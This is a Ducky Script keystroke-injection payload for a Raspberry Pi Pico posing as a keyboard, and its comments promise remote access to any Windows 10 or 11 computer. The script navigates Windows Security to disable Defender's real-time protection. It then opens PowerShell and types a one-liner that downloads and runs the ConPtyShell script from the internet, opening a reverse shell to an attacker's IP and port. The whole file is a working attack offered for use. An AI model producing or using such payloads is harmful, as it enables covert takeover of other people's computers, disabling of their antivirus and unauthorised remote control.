REM Remote access any computer using NetCat Reverse shell on Raspberry Pi Pico
REM Only Windows 10 and 11 fully supported. Maybe windows 7?
REM Please change the IP-ADDRESS-HERE and PORT-HERE to the ip address and port number of your Linux distro, WSL works!
REM There is surely a faster way to disable Windows Defender but I have not found one yet. :/
REM Adjust the delays to your preference, the faster the computer, the lower the delays need to be
REM Up to around 7 second NetCat Reverse Shells!
REM Credit goes to TeaPixl! and the awesome guys at Hak5 and PayloadsAllTheThings!
DELAY 500
REM Disable Windows Security
GUI
DELAY 500
STRING virus and threat
DELAY 500
ENTER
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
ENTER
DELAY 500
SPACE
DELAY 500
LEFTARROW
DELAY 500
ENTER
DELAY 500
ALT F4
DELAY 500
REM Enter Powershell and type in the script
GUI R
DELAY 500
STRING powershell
DELAY 500
ENTER
DELAY 500
STRING IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell IP-ADDRESS-HERE PORT-HERE
DELAY 500
ENTER
DELAY 500
